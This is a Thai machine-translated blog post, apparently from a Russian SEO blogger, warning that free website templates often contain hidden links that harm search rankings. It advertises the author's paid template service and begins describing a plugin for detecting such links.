ป.ล.ขณะที่เรียกดู TopSape Reader เมื่อเร็ว ๆ นี้ ฉันเห็นบล็อก SEO ใหม่ zenpr.ru ซึ่งครองอันดับ 1 ในหมู่บล็อกเกอร์ในแง่ของจำนวนคลิกต่อเดือน เนื่องจากอายุของเขาเพียงเดือนกว่า ผลลัพธ์จึงคู่ควรแก่การเคารพ การออกแบบในสไตล์มินิมัลลิสต์ถ้าไม่บอกว่าไม่มีอยู่จริง แต่ผู้เขียนเขียน - คุณจะอ่าน ธุรกิจทั้งหมดและไม่มีน้ำ เช่นเดียวกับในชื่อบล็อก - "อักขระพิเศษเป็นศูนย์" ฉันแนะนำให้อ่านคุณจะพบข้อมูลที่เป็นประโยชน์มากมาย
มีเทมเพลตเว็บไซต์ฟรีมากมายบนอินเทอร์เน็ต ที่ ฟรีชีสมันเกิดขึ้นแค่ในกับดักหนูเท่านั้น ใครๆ ก็รู้และยังเอื้อมมือไปดาวน์โหลดฟรีและติดตั้งบนเว็บไซต์ของคุณ
ก่อนติดตั้งเทมเพลตฟรี การตรวจสอบลิงก์ที่ซ่อนอยู่จะไม่เสียหาย
ด้วยการใส่เทมเพลตฟรี หลายคนไม่คิดว่าพวกเขาไม่สามารถโปรโมตและสร้างรายได้จากไซต์ดังกล่าวได้
ในเทมเพลตดังกล่าวสามารถมีได้หลายลิงค์พร้อมกัน นอกจากนี้ยังเป็นการดีหากลิงก์ที่ซ้อนกันนั้นเชื่อมโยงไปยังไซต์ที่คล้ายกับเรื่องของคุณ และไม่ใช่ไซต์สำหรับผู้ใหญ่ และจะมีเพียงสองหรือสามคนเท่านั้นไม่ใช่หลายสิบ
การติดตั้งเทมเพลตฟรีดังกล่าวคุกคามไซต์ของคุณอย่างไร ไซต์จะอยู่ภายใต้ตัวกรองซึ่งแทบจะเป็นไปไม่ได้เลยที่จะออกไป ไซต์ที่อยู่ภายใต้ตัวกรองเป็นไซต์ที่ตายแล้ว!
การติดตั้งเทมเพลตฟรีบนเว็บไซต์ของคุณก็เหมือนการเล่นรัสเซียนรูเล็ต โอกาสเดียวที่จะตั้งอย่างแน่นอน เทมเพลตที่สะอาด, เท่ากับศูนย์
อย่างดีที่สุด คุณจะได้รับ 3-5 ลิงก์ที่เหลืออยู่บนไซต์ของคุณ แน่นอนคุณสามารถลองล้างเทมเพลตดังกล่าวได้ แต่มีช่างฝีมือที่ป้อนลิงก์ลงในเทมเพลตในลักษณะที่ไม่สามารถลบออกจากที่นั่นได้ (เทมเพลตเสียมันแค่บิดเบี้ยว)
พูดตามตรง มันง่ายกว่าที่จะสั่งซื้อเทมเพลตใหม่ที่สะอาดและไม่ซ้ำใคร (ซึ่งไม่สามารถพูดได้ว่าฟรี) ซึ่งจะมีค่าใช้จ่ายน้อยกว่า
ตัวอย่างเช่น ฉันเรียกเก็บเงิน 200 รูเบิลสำหรับการสร้างเทมเพลต (เขียนถึง Skype: oxamitta) บอกเลยคุ้มไหม? รับฟรีและเสียไซต์ แต่ประหยัด 200 รูเบิล? ว้าว ประหยัด!!!
แต่ถ้าคุณได้เดิมพันกับเทมเพลตฟรีแล้ว จะตรวจสอบเทมเพลตสำหรับลิงก์ที่ซ่อนอยู่ได้อย่างไร
มีปลั๊กอินพิเศษสำหรับสิ่งนี้ การลบลิงก์เหล่านี้จะไม่ช่วย แต่เพื่อระบุลิงก์เหล่านี้ - ได้โปรด
อาจไม่ใช่ทุกอย่างที่น่ากลัวนัก และเทมเพลตของคุณมีลิงก์ภายนอกเพียงไม่กี่ลิงก์เท่านั้น! คุณต้องการทดสอบเทมเพลตหรือไม่ จากนั้นดาวน์โหลดปลั๊กอินจากลิงก์ด้านล่าง (หากต้องการดูลิงก์ดาวน์โหลดปลั๊กอิน ให้คลิกที่ปุ่มใดปุ่มหนึ่งของโซเชียลเน็ตเวิร์ก)
ปลั๊กอินได้รับการติดตั้งในแผงควบคุมของไซต์ด้วยวิธีมาตรฐาน มันไม่สมเหตุสมผลเลยที่จะถ่ายวิดีโอนี้ ดังนั้นวันนี้เราจะจัดการกับภาพหน้าจอสองสามภาพ
ติดตั้งปลั๊กอินและเปิดใช้งาน
หากต้องการขยายภาพหน้าจอให้คลิกด้วยปุ่มซ้ายของเมาส์
ไปที่แท็บลักษณะ TAS